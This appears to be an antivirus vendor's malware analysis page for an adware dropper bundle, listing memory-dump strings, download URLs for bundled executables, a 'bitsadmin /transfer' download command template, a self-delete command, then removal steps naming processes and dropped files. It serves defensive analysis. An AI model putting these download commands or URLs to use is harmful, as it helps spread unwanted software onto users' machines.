--nopatching --silent --rfr=789249 --rfr_homepage=789185 --rfr_dse=789235 --rfr_vbm=789242 "--partner_homepage=hXXp://medialogger.ru/api/savePostback?token=Qp3J3rfB06&guid=$__GUID&sig=$__SIG&ovr=$__OVR&ref=789185&info=x54&chid=2568&caid=268&type=mhome" "--partner_dse=hXXp://medialogger.ru/api/savePostback?token=Qp3J3rfB06&guid=$__GUID&sig=$__SIG&ovr=$__OVR&ref=789235&info=x54&chid=2569&caid=268&type=msearch" "--partner_vbm=hXXp://medialogger.ru/api/savePostback?token=Qp3J3rfB06&guid=$__GUID&sig=$SIG&ovr=$_OVR&ref=789242&info=x54&chid=2570&caid=268&type=mvbm"

MUpdater.exe

hXXp://s3-us-west-2.amazonaws.com/upperservice/MUpdater.exe

x37.Costbar.exe

hXXp://clklink.ru/uploads2/4cf37c9a-f28c-439e-bc02-01691d609e58/x37.Costbar.exe

360TS.exe

hXXps://s3-us-west-2.amazonaws.com/upperservice/360TS.exe

WebOptimumSetup.exe

hXXp://bscodecs.com/direct/downfold/lp.php?pub=exc353gi&campid=s1

c:\Program Files\Microsoft Visual Studio 10.0\VC\include\xtree

std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class std::basic_string<wchar_t,struct std::char_traits<wchar_t>,class std::allocator<wchar_t> >,class BundleControl *,struct std::less<class std::basic_string<wchar_t,struct std::char_traits<wchar_t>,class std::allocator<wchar_t> > >,class std::allocator<struct std::pair<class std::basic_string<wchar_t,struct std::char_traits<wchar_t>,class std::allocator<wchar_t> > const ,class BundleControl *> >,0> > >::operator ==

std::_Vector_const_iterator<class std::_Vector_val<class std::basic_string<wchar_t,struct std::char_traits<wchar_t>,class std::allocator<wchar_t> >,class std::allocator<class std::basic_string<wchar_t,struct std::char_traits<wchar_t>,class std::allocator<wchar_t> > > > >::operator  =

std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class std::basic_string<wchar_t,struct std::char_traits<wchar_t>,class std::allocator<wchar_t> >,class BundleControl *,struct std::less<class std::basic_string<wchar_t,struct std::char_traits<wchar_t>,class std::allocator<wchar_t> > >,class std::allocator<struct std::pair<class std::basic_string<wchar_t,struct std::char_traits<wchar_t>,class std::allocator<wchar_t> > const ,class BundleControl *> >,0> > >::operator *

std::_String_const_iterator<wchar_t,struct std::char_traits<wchar_t>,class std::allocator<wchar_t> >::operator  =

std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class std::basic_string<wchar_t,struct std::char_traits<wchar_t>,class std::allocator<wchar_t> >,class BundleControl *,struct std::less<class std::basic_string<wchar_t,struct std::char_traits<wchar_t>,class std::allocator<wchar_t> > >,class std::allocator<struct std::pair<class std::basic_string<wchar_t,struct std::char_traits<wchar_t>,class std::allocator<wchar_t> > const ,class BundleControl *> >,0> > >::operator

c:\Program Files\Microsoft Visual Studio 10.0\VC\include\algorithm

invalid operator<

std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class std::basic_string<wchar_t,struct std::char_traits<wchar_t>,class std::allocator<wchar_t> >,class BundleControl *,struct std::less<class std::basic_string<wchar_t,struct std::char_traits<wchar_t>,class std::allocator<wchar_t> > >,class std::allocator<struct std::pair<class std::basic_string<wchar_t,struct std::char_traits<wchar_t>,class std::allocator<wchar_t> > const ,class BundleControl *> >,0> > >::operator --

c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlcomcli.h

c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlsimpstr.h

Warning: implicit LoadString(%u) failed

c:\%original file name%.exe

1.tmp.exe_3248:

.text

`.rdata

@.data

.rsrc

@.reloc

1.0.6, 6-Sept-2010

(VVV.memtest86.com). At the time of writing it is free (GPLd).

bzip2/libbzip2: internal error number %d.

This is a bug in bzip2/libbzip2, %s.

Please report it to me at: [email protected]. If this happened

component, you should also report this bug to the author(s)

of that program. Please make an effort to report this bug;

timely and accurate bug reports eventually lead to higher

combined CRCs: stored = 0xx, computed = 0xx

{0xx, 0xx}

[%d: huff mtf

GetProcessWindowStation

operator

function not supported

operation canceled

address_family_not_supported

operation_in_progress

operation_not_supported

protocol_not_supported

operation_would_block

address family not supported

broken pipe

inappropriate io control operation

not supported

operation in progress

operation not permitted

operation not supported

operation would block

protocol not supported

KERNEL32.dll

ole32.dll

RegOpenKeyW

ADVAPI32.dll

RegCloseKey

OLEAUT32.dll

RegOpenKeyExW

Kernel32.dll

ShellExecuteW

Shell32.dll

GetProcessHeap

GetCPInfo

bin.exe

zcÁ

Hf%F{

.Kkc!

Fq.MD

W/u.BX

y^dP4.yc

]S'.ab

.PFM*C

<assemblyIdentity type="win32" processorArchitecture="*" version="24.88.0.333" name="point"/>

<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>

<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>

<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>

<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>

<ms_asmv2:requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>

name="Microsoft.Windows.Common-Controls"

version="6.0.0.0"

publicKeyToken="6595b64144ccf1df"

:.;4;8;<;@;

>!>%>)>->1>5>9>

0 0$0(0,0004080<0

mscoree.dll

- CRT not initialized

- Attempt to initialize the CRT more than once.

- floating point support not loaded

kernel32.dll

USER32.DLL

KERNEL32.DLL

!"#$%&'()* ,-./0

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\1.tmp.exe

7.24.4.6

xcd.exe

1.tmp.exe_3248_rwx_00350000_00030000:

.text

`.rdata

@.data

.rsrc

@.reloc

Sending request %S

%S - transfer terminated

Error %d transferring %S

Status code %d returned from %S

Trying to redirect from %S to %S

AsyncWinHttp added contentLength %d to s_nTotalBytes2Download %d

Query Data: Error %d encountered (%S)

Read Data: Error %d encountered (%S)

AsyncWinHttp::AsyncCallback WINHTTP_CALLBACK_STATUS_DATA_AVAILABLE download error update total sizes.

WinHttpGetIEProxyConfigForCurrentUser

WinHttpSetStatusCallback

Download %S ended

Download from %S failed, status=%d, error=%d

%Y-%m-%d %H:%M:%S

RegOpenKeyExA

RegCloseKey

SOFTWARE\Microsoft\Windows NT\CurrentVersion

ShellExecuteExW

"'\?<>&= %,/:!#$;[]()

Process=%S command=%S verb=%S, result=%d

operator

GetProcessWindowStation

C:\Amon\Current\BootStrapper\Release\Bundle.pdb

KERNEL32.dll

USER32.dll

RegCreateKeyExW

ADVAPI32.dll

SHELL32.dll

WinHttpCloseHandle

WinHttpSetOption

WinHttpOpen

WinHttpSendRequest

WinHttpOpenRequest

WinHttpConnect

WinHttpCrackUrl

WinHttpGetProxyForUrl

WinHttpQueryHeaders

WinHttpQueryDataAvailable

WinHttpReadData

WinHttpReceiveResponse

WINHTTP.dll

GetCPInfo

GetProcessHeap

.?AVAsyncWinHttp@@

zcÁ

?456789:;<=

!"#$%&'()* ,-./0123

<assemblyIdentity type="win32" processorArchitecture="*" version="1.1.1.1" name="Bundle"/>

<!--This Id value indicates the application supports Windows Vista functionality -->

<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>

<!--This Id value indicates the application supports Windows 7 functionality-->

<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>

<!--This Id value indicates the application supports Windows 8 functionality-->

<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>

<!-- Windows 10 -->

<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>

<ms_asmv2:requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>

type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" />

8€8S8

<#<'< </<3<7<;<

Content-Type: application/x-www-form-urlencoded

shlwapi.dll

Winhttp.dll

5Winhttp.dll

ibnd.txt

.amonin

st.co

ex.php

instid[%s]

%S.ini

Wamitest.txt

Send Report Status

kernel32.dll

advapi32.dll

yadvapi32.dll

Iphlpapi.dll

SYSTEM\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\%S\Connection

v1.1.4322

v2.0.50727

Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice

%ProgramFiles%\Microsoft Silverlight\sllauncher.exe

%ProgramW6432%\Microsoft Silverlight\sllauncher.exe

NT%d.%dSP%d

nadvapi32.dll

%ProgramFiles%\Mozilla Firefox\firefox.exe

%localappdata%\Google\Chrome\Application\chrome.exe

%ProgramFiles%\Google\Chrome\Application\chrome.exe

shell32.dll

%d.%d.%d.%d

%%X

Wversion.dll

version.dll

ole32.dll

OleAut32.dll

KERNEL32.DLL

mscoree.dll

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

WUSER32.DLL

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\1.tmp.exe

1.0.0.1

Setup.exe

amisetup7849__99999_il2.exe_3340:

.text

`.rdata

@.data

.rsrc

@.reloc

1.0.6, 6-Sept-2010

(VVV.memtest86.com). At the time of writing it is free (GPLd).

bzip2/libbzip2: internal error number %d.

This is a bug in bzip2/libbzip2, %s.

Please report it to me at: [email protected]. If this happened

component, you should also report this bug to the author(s)

of that program. Please make an effort to report this bug;

timely and accurate bug reports eventually lead to higher

combined CRCs: stored = 0xx, computed = 0xx

{0xx, 0xx}

[%d: huff mtf

GetProcessWindowStation

operator

function not supported

operation canceled

address_family_not_supported

operation_in_progress

operation_not_supported

protocol_not_supported

operation_would_block

address family not supported

broken pipe

inappropriate io control operation

not supported

operation in progress

operation not permitted

operation not supported

operation would block

protocol not supported

38 103 78

90 59 67 101 113 106 90 29

88 55 65 100 70 99 113 45 74

89 26 102 51 55 33 122 50 67

89 23 105

89 59 91 68 70

89 59 91 80 108 119 123 50

113 50 74 51 55 33 122 50 67

76 59 78 100 67 102 114 59

109 44 89

73 44 70 116 96 73 119 50 74

105 44 68 115 113

KERNEL32.dll

GetProcessHeap

GetCPInfo

bin.exe

zcÁ

7.FT@

.Nl1~

H#%F<

.Sjfgn

g".RV_

1.ABC

Jú!

B$.kGt

.Jtbsy,i

.tq:]

.kz|_

99999999995

6y.Pth

v.PMP

~'%cQ

Q91LH.uk~f

333333333331

{.NE\

I%FST

=B%xzW

S4.WQ

][%SC

] .lS3

.IT@xA

`9e%s

`y.HR

Q'.Lx

.hsB$;

:.IU%

xd.KM

.IXI<

[7.uo

) .tn

98I%F

:.Sky

.FY9~

R.B%X

|.xpd

%.WkX

JpN^.sL

<assemblyIdentity type="win32" processorArchitecture="*" version="1.0.0.0" name="design.needfullsoft.x-series.package"/>

<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>

<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>

<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>

<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>

<ms_asmv2:requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>

<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" />

&141,282

2 2$2(2,20242~2

3)4/454=4

0 0$0(0,0004080<0

mscoree.dll

- CRT not initialized

- Attempt to initialize the CRT more than once.

- floating point support not loaded

kernel32.dll

USER32.DLL

10 67 50

29 68 51

63 127 26 97 35

25 83 36 69 28 94 15

30 83 39 84 21 90

25 115 4 101 28 126 47

26 75 34 69

!"#$%&'()* ,-./0

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\amisetup7849__99999_il2.exe

1.0.0.0

xcd.exe

amisetup7849__99999_il2.exe_3340_rwx_023D0000_000B4000:

.text

`.rdata

@.data

.rsrc

@.reloc

j5SSh

F(0%D

F,D%D

8%uEP3

u.hUw

xSSSh

FTPjKS

FtPj;S

C.PjRV

Visual C   CRT: Not enough memory to complete call to strerror.

Broken pipe

Inappropriate I/O control operation

Operation not permitted

portuguese-brazilian

operator

GetProcessWindowStation

WinHttpSetStatusCallback

Failed to get the Temp folder: %d

RegOpenKeyTransactedW

RegCreateKeyTransactedW

RegDeleteKeyTransactedW

RegDeleteKeyExW

CInstallationManager::IsPartOfInstallation value=%s

CInstallationManager::SetComponentInstallationEnded %S

%Y-%m-%d %H:%M:%S

CProgressUpdateRequest::CreateInstance %S

CProgressUpdateRequest::ProgressUpdate %S

Send progress update request %s

Progress Request for '%S' return %s

xOH/4DS07Ads Y4ni8/U8Pczgv1VM86eP73i1uvhNpP2LHv4ny6A89z//yzHzA5n85Q/zuDQ6rMsgvsbYPOcOM732vf9K4L9VSm4g0E=

xOH/4DS07Ads Y4ni8/U8Pczgv1VM86eP73i1uvhNpP2LHv4ny6A89z//yzHzA5n85Q/zvfA6rMsgvsbYPOca4bu0fr2McfmAW/yiSaP89zx/WXHqhcD

xOH/4DS07Ads Y4ni8/U8Pczgv1VM86eP73i1uvhNpP2LHv4ny6A89z//yzHzA5n85Q/zvfA6rMsgvsbYPOca4fp0/HhMob7BmbzwWvL/78=

%c%c%c%c

VERSION.dll

KERNEL32.dll

USER32.dll

GDI32.dll

RegDeleteKeyW

RegCloseKey

RegQueryInfoKeyW

RegEnumKeyExW

RegOpenKeyExW

RegCreateKeyExW

ADVAPI32.dll

SHELL32.dll

ole32.dll

OLEAUT32.dll

SHLWAPI.dll

Secur32.dll

WinHttpCloseHandle

WinHttpOpen

WinHttpSetOption

WinHttpGetProxyForUrl

WinHttpCrackUrl

WinHttpConnect

WinHttpOpenRequest

WinHttpSetStatusCallback

WinHttpSendRequest

WinHttpQueryHeaders

WinHttpQueryDataAvailable

WinHttpReadData

WinHttpReceiveResponse

WINHTTP.dll

GetProcessHeap

GetCPInfo

zcÁ

.?AVAsyncWinHttp@@

.?AV?$_IDispEventLocator@$0MJ@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@

.?AV?$IDispEventSimpleImpl@$0MJ@VCBoot@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@

.?AUISupportErrorInfo@@

.?AV?$CAtlExeModuleT@VCBootStrapperModule@@@ATL@@

?456789:;<=

!"#$%&'()* ,-./0123

telexes.compiles.1 = s 'Inst Class'

CLSID = s '{4cf1ec1d-2055-4a46-b248-11fb57f52868}'

telexes.compiles = s 'Inst Class'

CurVer = s 'telexes.compiles.1'

ForceRemove {4cf1ec1d-2055-4a46-b248-11fb57f52868} = s 'Inst Class'

ProgID = s 'telexes.compiles.1'

VersionIndependentProgID = s 'telexes.compiles'

val ServerExecutable = s '%MODULE_RAW%'

TypeLib = s '{de2deba6-37b4-4d2f-8a78-56effa49ba84}'

.sssh

REÚ

\.crr

s1f-'

.DC l

tweb

<assemblyIdentity type="win32" processorArchitecture="*" version="1.2.1.2" name="win"/>

<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>

<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>

<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>

<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>

<ms_asmv2:requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>

type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" />

stdole2.tlbWWW(

msgWd

keyNameW

urlW

url2d

YtcmdLineW

P%CreateIconWW

iconUrlW

regKeyWW

CheckRegKeyW

keyWd

W.launchCommandLineWWW

~cmdW

WDIsShortNameInstalledd

Created by MIDL version 7.00.0555 at Mon Jul 18 19:01:37 2016

0(171]1|1

="=(=.=`=

6 6$6(6~6

: :$:<:@:\:`:|:

<(<4<@<`<

mscoree.dll

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

wKERNEL32.DLL

ADVAPI32.DLL

WUSER32.DLL

Winhttp.dll

Content-Type: application/x-www-form-urlencoded

shlwapi.dll

HKEY_CURRENT_CONFIG

HKEY_DYN_DATA

HKEY_PERFORMANCE_DATA

HKEY_USERS

HKEY_LOCAL_MACHINE

HKEY_CURRENT_USER

HKEY_CLASSES_ROOT

appimageurl

cmdl

capp=%s&cid=%s&mhx=%S&base=%s

\bitsadmin.exe

\Support Tools\bitsadmin.exe

:?*\"'/.

%sami%s%d%d.exe

%d-%.2d-%.2dT%.2d:%.2d:00

%d-%.2d-%.2dT%.2d:-:00

/retrynav %d

Advapi32.dll

shell32.dll

{23A96663-59D1-4C44-A0DB-1118D9C4ABBA}

OLEAUT32.DLL

kernel32.dll

sn=%s&hx=%S&base=%s

rfsw%d

advapi32.dll

v2.0.50727

v1.1.4322

Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice

%ProgramW6432%\Microsoft Silverlight\sllauncher.exe

%ProgramFiles%\Mozilla Firefox\firefox.exe

ami%sExd

bitsadmin /transfer amijob /download /priority high %s %s

ami%sExi

/c del "%s"

cmd.exe

%TEMP%\task.vbs

ami%sExdel

%%X

version.dll

OleAut32.dll

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\amisetup7849__99999_il2.exe

{8856F961-340A-11D0-A96B-00C04FD705A2}

1.1.5.26

setup.exe

smaltinecdcf.site

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):

amisetup7548__10235_il2.exe:1004
chcUpdateTsk.exe:1096
chcUpdateSrv.html5:1700
chcUpdateSrv.html5:548
ckehack.html5:1692
ckehack.html5:468
ckehack.html5:456
ckehack.html5:2032
nop.exe:1512
1.tmp.exe:1340
1.tmp.exe:1836
1.tmp.exe:2732
ping.exe:560
ping.exe:1008
regsvr32.exe:1500
amisetup7604__99999_il2.exe:652
rundll32.exe:1608
tmnqck.exe:2024
chcUpdateTsk.html5:1240
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:

%Documents and Settings%\%current user%\Local Settings\Temp\amipixel.cfg (116 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\YB33U3FA\amipb[1].js (32425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amisetup7548__10235_il2.exe:typelib (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GLQUASXM\index[1].htm (2197 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amitest.txt (39 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\MR05AJUV\desktop.ini (67 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\CZW1U92J\desktop.ini (67 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\C1W14R8D\desktop.ini (67 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\YHAV8105\desktop.ini (67 bytes)
%Documents and Settings%\LocalService\Cookies\index.dat (388 bytes)
%Documents and Settings%\LocalService\Cookies\system@upxnav[1].txt (212 bytes)
%Documents and Settings%\%current user%\Cookies\matile.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\awh2.tmp (177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\awh3.tmp (105356 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\awh4.tmp (177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\awh5.tmp (105356 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\awhA.tmp (103196 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\awh9.tmp (177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\prepreinstaller_win.exe (4013 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\YB33U3FA\Bundle[1].exe (30186 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4N740QDH\prepreinstaller_win[1].exe (30122 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\MUpdater.exe.config (165 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1.tmp.exe (3416 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1OITCXMZ\MUpdater.exe[1].config (165 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\awh6.tmp (3560 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4N740QDH\index[1].htm (1203 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\awh7.tmp (45428 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amisetup7604__99999_il2.exe:typelib (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{DD51A01D-FCBE-4AA1-B167-045919599065} (164908 bytes)
%Program Files%\Chocosyledusy\chcUpdateSrv.html5 (3749 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GLQUASXM\1.n[1].txt (164388 bytes)
%Program Files%\Coabuied\ckehack.html5 (8 bytes)
%Program Files%\Coabuied\Chocosyledusy.7z2 (1693 bytes)
%Program Files%\Coabuied\config.ini (147 bytes)
%Program Files%\Coabuied\@A3592ADB-854A-443A-854E-EB92130D470D.xpi (1612 bytes)
%Program Files%\Coabuied\wihoy.dll (1657 bytes)
%Program Files%\Atidogrudck\atdagent.dll (1717 bytes)
%Program Files%\Coabuied\DeElevator.dll (260 bytes)
%Program Files%\Coabuied\conf.json (877 bytes)
%Program Files%\Coabuied\shehele.dat (260 bytes)
%Program Files%\Coabuied\matile.dll (309 bytes)
%Program Files%\Chocosyledusy\chcUpdateSrv.html5.ini (247 bytes)
%Program Files%\Atidogrudck\atdagent.dll.ini (91 bytes)
%Program Files%\Chocosyledusy\chcUpdateTsk.html5.ini (247 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{B45A900F-0CB7-44A9-89C2-F36A56D5F94E} (653285 bytes)
%Program Files%\Coabuied\Atidogrudck.7z2 (169 bytes)
%WinDir%\Tasks\Chocosyledusy Update.job (5526 bytes)
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.